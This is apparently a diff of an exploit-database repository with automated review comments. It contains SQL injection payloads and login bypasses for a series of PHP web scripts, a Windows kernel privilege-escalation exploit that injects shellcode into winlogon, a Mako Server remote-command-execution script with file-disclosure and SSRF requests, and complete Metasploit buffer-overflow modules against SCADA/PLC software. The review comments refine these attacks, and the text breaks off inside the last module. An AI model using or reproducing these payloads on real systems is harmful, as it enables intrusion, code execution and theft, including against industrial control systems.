# Software Link: http://www.icloudcenter.com/student-course-assessment-test-script.htm
# Demo: http://icloudcenter.net/demos/icstudents/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
#
# -EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68313e494853414e2053454e43414e3c2f68313e,(/*!00009Select*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_name*/,0xa3a,2)),@,2))--+-
#
# Etc..
# # # # #

platforms/php/webapps/42678.txt Executable file (27 lines)

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: ICSurvey- Survey Creating Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/survey-creating-script.htm
# Demo: http://icloudcenter.net/demos/icsurvey/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
#
# http://localhost/[PATH]/survey.php?page=preview&test=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42679.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Jewelry Store Site Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/jewelry-site-script.htm
# Demo: http://icloudcenter.net/demos/icjewelry/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42680.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Custom T-Shirt WebStore Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/t-shirt.htm
# Demo: http://icloudcenter.net/demos/ictshirt/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42681.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Customized Products Shopping Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/bpProductConfigurator.htm
# Demo: http://icloudcenter.net/demos/icproductconfigurator/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42682.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Grocery Store Supermarket Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/grocery-store-supermarket-script.htm
# Demo: http://icloudcenter.net/demos/icgrocery/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42684.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Car Rental Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/limousine-car-hire-script.html
# Demo: http://icloudcenter.net/demos/iccalllimousine/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #
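Review bot: `# Exploit Title:` calls the product `Car Rental Script 1.1`, but `# Software Link:` (`limousine-car-hire-script.html`) and `# Demo:` (`demos/iccalllimousine/`) identify it as the limousine car hire script; use the vendor's product name in the title so the advisory can be matched to the right package.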

platforms/php/webapps/42685.txt Executable file (31 lines)

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Project Bidding Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/project_bidding_script.htm
# Demo: http://www.icloudcenter.net/demos/icprojectbidding/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42686.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Dental Clinic Site Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/dental-clinic-script.htm
# Demo: http://icloudcenter.net/demos/icdentalclinic/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42688.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Support Tickets Helpdesk PHP Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/support-tickets-helpdesk-script.htm
# Demo: http://icloudcenter.net/demos/ichelpdesk/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&pk=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42689.txt Executable file (29 lines)

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Website Builder Script With e-Commerce 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/site-builder-script.htm
# Demo: http://icloudcenter.net/demos/icsitebuilder/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
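Review bot: this advisory bundles two distinct findings under the single title `SQL Injection`: the `nid` parameter of `index.php?page=news` and the admin login bypass with `User: 'or 1=1 or ''='`. List them as separate items in `# Description:` so the vendor can track each fix; the second one is also an authentication bypass and should be labelled as such, as 42675 in this commit does.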


@ -34,7 +34,9 @@ Timeline:
Exploitation:
=============
This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token and dec a controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token's _SEP_TOKEN_PRIVILEGES->Enabled and dec the controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
Note that this exploit doesn't use any kernel mode shellcode :->
References:
===========
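Review bot: in the rewritten Exploitation paragraph (the second of the two lines beginning `This exploit uses a data only attack`), `dec the controlled address by 0x50` reads as shorthand; spell out `decrement`, and drop the apostrophe in `SeDebugPrivilege's`, since this sentence is the advisory's one-line statement of the technique and is what readers will quote.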
@ -222,11 +224,10 @@ def alloc_pool_overflow_buffer(base, input_size):
print "(+) allocating pool overflow input buffer"
baseadd = c_int(base)
size = c_int(input_size)
priv = token + 0x40 + 0x8 # Enabled
input = struct.pack("<I", 0x0000001a) # size
input += "\x44" * 0x398 # offset to overflown chunks
priv = token + 0x40 + 0x8 # Enabled
# patch
input += struct.pack("<I", 0x040a008c) # _POOL_HEADER
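Review bot: moving `priv = token + 0x40 + 0x8 # Enabled` above the buffer construction is only a reordering, but the two offsets stay magic numbers; the comment `# Enabled` together with the Exploitation paragraph (`_SEP_TOKEN_PRIVILEGES->Enabled`) implies `0x40` is the offset of the privileges structure inside the token and `0x8` the offset of its `Enabled` member, so write that in the comment rather than leaving the reader to reconstruct it from the prose.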
@ -235,13 +236,13 @@ def alloc_pool_overflow_buffer(base, input_size):
input += struct.pack("<I", 0x00000000)
input += struct.pack("<I", 0x00000001)
input += "\x44" * 0x20
input += struct.pack("<I", 0x00000001)
input += struct.pack("<I", 0x00000001) # set @ecx to 0x1, to write another 0x4 dwords
input += struct.pack("<I", 0x00000000)
input += "\x44" * 8
input += struct.pack("<I", 0x00000001)
input += struct.pack("<I", 0x00000001)
input += "\x44" * 4
input += struct.pack("<I", 0x0008000e)
input += struct.pack("<I", 0x0008000e) # restore the TypeIndex ;-)
input += struct.pack("<I", priv) # Quota Process Pointer Overwrite
# filler
@ -354,33 +355,41 @@ def we_can_leak_token():
def trigger_lpe():
"""
This function frees the IoCompletionReserve objects and this triggers the
registered aexit, which is our controlled pointer to OkayToCloseProcedure.
This function frees the Mutant objects and this triggers the
usage of the Quota Process Pointer, dec'ing by 0x50, avoiding OkayToCloseProcedure.
"""
# free the corrupted chunk to trigger OkayToCloseProcedure
# we dont know where the free chunk is, we just know its in one of the pages
# full of Mutants and that its the 2nd chunk after the overflowed buffer.
# full of Mutants and that its the 2nd chunk after the overflowed buffer. Good enough.
for v in to_free:
kernel32.CloseHandle(v)
def get_winlogin_pid():
"""
Just gets winlogon pid. Get whateva system pid you want
"""
for proc in psutil.process_iter():
# choose whateva system process
if proc.name() == "winlogon.exe":
return proc.pid
return 0
def we_can_inject():
"""
Now that we have the SeDebugPrivilege, we can inject into a system process.
I choose winlogon because you get the bonus GUI.
"""
page_rwx_value = 0x40
process_all = 0x1F0FFF
memcommit = 0x00001000
process_handle = windll.kernel32.OpenProcess(process_all, False, get_winlogin_pid()) # WinLogin
if process_handle == 0:
return False
print "(+) got a handle to winlogon! 0x%x" % process_handle
process_all = 0x1f0fff
memcommit = 0x00001000
hThread = HANDLE()
# metasploit EXITFUNC=Thread
# get a handle to the process
pHandle = windll.kernel32.OpenProcess(process_all, False, get_winlogin_pid())
if pHandle == 0:
return False
print "(+) got a handle to winlogon! 0x%x" % pHandle
# metasploit windows/exec CMD=cmd.exe EXITFUNC=Thread
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
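Review bot: the comment `# free the corrupted chunk to trigger OkayToCloseProcedure` above the `for v in to_free:` loop is now stale; the rewritten docstring immediately above it says the free exercises the Quota Process Pointer path and avoids `OkayToCloseProcedure`, so update the comment to match. In `we_can_inject`, `page_rwx_value = 0x40`, `process_all = 0x1f0fff` and `memcommit = 0x00001000` are raw constants; comment them with their Win32 names (PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS, MEM_COMMIT). `get_winlogin_pid` returns 0 when no `winlogon.exe` is found, which the caller only detects indirectly through `if pHandle == 0`; a direct check of the pid with its own message would make the failure mode clearer.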
@ -398,13 +407,16 @@ def we_can_inject():
buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
buf += "\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00"
shellcode_length = len(buf)
hThread = HANDLE()
memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
print "(+) allocated shellcode in winlogon @ 0x%x" % memory_allocation_variable
res = windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, buf, shellcode_length, 0)
# allocate some memory in the process
fPointer = windll.kernel32.VirtualAllocEx(pHandle, 0, len(buf), memcommit, page_rwx_value)
print "(+) allocated shellcode in winlogon @ 0x%x" % fPointer
# write the shellcode to the memory
res = windll.kernel32.WriteProcessMemory(pHandle, fPointer, buf, len(buf), 0)
print "(+) WriteProcessMemory returned: 0x%x" % res
res = windll.ntdll.RtlCreateUserThread(process_handle, None, 0, 0, 0, 0, memory_allocation_variable, 0, byref(hThread), 0)
# create a new thread that starts execution at that code location
res = windll.ntdll.RtlCreateUserThread(pHandle, None, 0, 0, 0, 0, fPointer, 0, byref(hThread), 0)
print "(+) RtlCreateUserThread returned: 0x%x" % res
return True


@ -0,0 +1,161 @@
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec
Vulnerabilities Summary
The following advisory describe three (3) vulnerabilities found in Mako Servers tutorial page.
The vulnerabilities found are:
Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery
As these tutorial may be used as the basis for production code, it is important for users to be aware of these issues.
“As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides
an application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems.”
Credit
An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the
technical claims, to give a fix timeline or coordinate an advisory, saying:
“I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.
Internally I need to set-up a cost allocation account for billing against these support inquiries.”
At this time its unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed.
Vulnerabilities details
Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution:
Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to save.lsp web page, the input passed
to a function responsible for accessing the filesystem.
The attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to manage.lsp
HTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true&ex=2.1&type=lua'
Proof of Concept
import urllib2,time
#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx
#=========================================
print 'MakoServer v2.5 Remote Command Execution'
CMD="os.execute('c:/Windows/system32/calc.exe')"
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'
opener.open(request)
time.sleep(1)
urllib2.urlopen('http://IP/examples/manage.lsp?execute=true&ex=2.1&type=lua')
Unauthenticated File Disclosure
Mako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI IP/fs/../.., the input passed
without modification and the response with the file content is returned.
Proof of Concept
The following GET request will response with the C/Windows/system.ini content:
curl -v http://VICTIM-IP/fs/C/Windows/system.ini
* About to connect() to VICTIM-IP port 80
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Server Side Request Forgery
Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the rtl/appmgr/new-application.lsp
URI, the input will be executed and the server will connect to the attackers machine.
Proof of Concept
Start Wireshark to see successful connections made from Mako Web Server victim machine.
Initiate requests from another machine using CURL:
curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
====================
Would like to acknowledge Beyond Securitys SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3391
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
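Review bot: the 'Unauthenticated File Disclosure' section describes the flaw as a traversal through `IP/fs/../..`, but the proof of concept, `curl -v http://VICTIM-IP/fs/C/Windows/system.ini`, contains no `..` sequence at all: the `/fs/` handler serves an arbitrary absolute path directly, which is a different (and simpler) defect than the one described, and the text should match the request actually shown. Two smaller points: the 'Disclosure Timeline' heading has no entries, although the vendor-response paragraph already gives an Aug 13 notification date that belongs there; and the RCE payload `os.execute('c:/Windows/system32/calc.exe')` only demonstrates on Windows, while the quoted product text positions the server for embedded Linux, so anyone testing a Linux install must substitute a command.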


@ -0,0 +1,68 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'ZScada Net Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
Z-Scada Net 2.0. The vulnerability is triggered when parsing
the response to a Modbus packet.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'url', 'https://lists.immunityinc.com/pipermail/canvas/2014-December/000141.html' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# zscadanet.exe v1.0
# pop ecx/ pop ebp/ retn
'Ret' => 0x00429c35
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 11 2014'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 502])
], self.class)
end
def on_client_data(client)
p = payload.encoded
buf = pattern_create(5000)
buf[574, 4] = [0x909006eb].pack('V') # jmp $+8
buf[578, 4] = [target.ret].pack('V')
buf[582, 24] = "\x41" * 24
buf[606, p.length] = p
client.put(buf)
handler
service.close_client(client)
end
end
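Review bot: the reference type in `[ 'url', 'https://lists.immunityinc.com/pipermail/canvas/2014-December/000141.html' ]` must be the upper-case `'URL'`; Metasploit matches reference types by exact string, so the lower-case key is rendered as a literal 'url (...)' entry rather than a link, and msftidy flags it. Also, the layout written in on_client_data (a 4-byte short jump at offset 574 followed by a pop/pop/ret address at 578, with the jump landing on the padding ahead of the payload) is an SEH-record overwrite, but the description only says 'stack based buffer overflow'; say so, because SafeSEH and SEHOP on the target decide whether a handler address in zscadanet.exe works at all, and that is presumably why the single target is Windows XP SP3.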


@ -0,0 +1,73 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'VIPA Authomation WinPLC7 recv Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in VIPA
Automation WinPLC7 <= 5.0.45.5921. The overflow is triggered when
WinPLC7 connects to a remote server and accepts a malicious packet.
The first 2 bytes of this packet are read in and used as the size
value for a later recv function. If a size value of sufficiently
large size is supplied a stack buffer overflow will occur
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '17-112' ],
[ 'CVE', '2017-5177' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-054-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# ws7v5.exe
# jmp esp
'Ret' => 0x00422354
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 28 2017'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 7777])
], self.class)
end
def on_client_data(client)
p = payload.encoded
pkt = "\x13\x88\x00\x00\x00" # len
pkt += Rex::Text.pattern_create(5000)
pkt[848, 4] = [target.ret].pack('V')
pkt[852, p.length] = p
client.put(pkt)
handler
service.close_client(client)
end
end
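Review bot: the module Name, 'VIPA Authomation WinPLC7 recv Stack Buffer Overflow', misspells 'Automation' (the description below spells it correctly). One thing worth a comment in on_client_data: the prefix `pkt = "\x13\x88\x00\x00\x00" # len` encodes 0x1388 = 5000 in the first two bytes, i.e. the oversized length the description says is read and later passed to recv, and the 5000-byte pattern that follows matches it exactly; noting that the value is big-endian and equals the body length saves the next maintainer from working it out, and makes it obvious what to change if the payload needs more room.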

platforms/windows/remote/42694.rb Executable file

@ -0,0 +1,100 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sielco Sistemi Winlog <= 2.07.16',
'Description' => %q{
This module exploits a stack based buffer overflow
found in Sielco Sistemi Winlog <= 2.07.16. The
overflow is triggered during the parsing of a
maliciously crafted packet
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 150,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => 'True',
# add esp, -5500
'PrependEncoder' => "\x81\xc4\x84\xea\xff\xff",
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN (Automatic Washing System Demo)',
{
# vcldb40.bpl
# jmp esp
'Ret' => 0x46035f8b,
'Offset' => 160,
'jmp' => "\xe9\x56\xff\xff\xff",
}
],
[
'Windows XP SP3 EN (Car Simulation)',
{
# vcl40.bpl
# jmp esp
'Ret' => 0x4003eb6b,
'Offset' => 175,
'jmp' => "\xe9\x46\xff\xff\xff",
}
],
[
'Windows XP SP3 EN (Ceramics Kiln)',
{
# ter19.dll
# push esp/ retn
'Ret' => 0x258b4432,
'Offset' => 176,
'jmp' => "\xe9\x46\xff\xff\xff",
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 26 2012'))
register_options([Opt::RPORT(46824)], self.class)
end
def exploit
connect
boom = rand_text_alpha_upper(20)
boom << 'x'
boom << rand_text_alpha_upper(target['Offset'])
boom << [target.ret].pack('V')
boom << "\x41" * 4
boom << target['jmp']
boom << "\xcc" * (281 - boom.length)
boom[22,4] = "\x41" * 4
boom[26,payload.encoded.length] = payload.encoded
print_status("Trying target #{target.name}...")
sock.put(boom)
handler
end
end
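Review bot: `'References' => [ ]` is empty, so the module carries no pointer to any advisory or CVE for the Winlog overflow it exploits, and `'Version' => '$Revision: $'` is a stale SVN keyword that current Metasploit no longer uses; msftidy reports both. Also note that the three targets are named after Winlog demo projects ('Automatic Washing System Demo', 'Car Simulation', 'Ceramics Kiln') and take their return addresses from the modules those particular projects load (vcldb40.bpl, vcl40.bpl, ter19.dll), so a production Winlog deployment running its own project will most likely need a fresh jmp esp or push esp/retn address; the description should state that the targets are demo-project specific rather than leaving a reader to infer it from the target names.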


@ -0,0 +1,84 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Motorola Netopia Netoctopus SDCS Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability within the code responsible for
parsing client requests. When reading in a request from the network,
a 32-bit integer is read in that specifies the number of bytes that
follow. This value is not validated, and is then used to read data into
a fixed-size stack buffer.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=851' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'DisableNops' => 'true',
'BadChars' => "",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# pop ecx/ pop ecx/ retn
# msvcrt.dll
'Ret' => 0x0044e046,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 14 2008'))
register_options(
[
Opt::RPORT(3814)
], self.class )
end
def exploit
connect
p = payload.encoded
pkt = "\x41" * 600
pkt[0, 4] = [0x01000000].pack('V')
pkt[8, 4] = [0x01000000].pack('V')
pkt[12, 4] = [0x01000000].pack('V')
pkt[16, 4] = [0x03000000].pack('V') # this is the value mentioned above
pkt[20, 4] = [0x66000000].pack('V')
pkt[30, p.length] = p
pkt[545, 4] = "\xeb\x06\x90\x90"
pkt[549, 4] = [target.ret].pack('V')
pkt[558, 6] = "\x81\xc4\x34\x06\x00\x00" # add esp, 1588
pkt[564, 2] = "\xff\xe4" # jmp esp
print_status("Trying target %s..." % target.name)
sock.put(pkt)
handler
disconnect
end
end
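Review bot: the target comment `# msvcrt.dll` above `'Ret' => 0x0044e046` does not match the address: 0x0044e046 lies in the 0x00400000 range where the main executable image is mapped, not where msvcrt.dll maps on XP SP3 (the Dameware module added in this same commit uses 0x77c35459 for its msvcrt.dll gadget). Either the comment or the address is wrong, and it matters because a gadget in the server executable is tied to the Netoctopus build while one in msvcrt.dll is tied to the OS service pack. `'Version' => '$Revision: $'` is a stale SVN keyword here too.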


@ -0,0 +1,71 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Fatek Automation
PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
connects to a listening server. The client does not properly sanitize the length
of the received input prior to placing it on the stack.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '16-672' ],
[ 'CVE', '2016-8377' ],
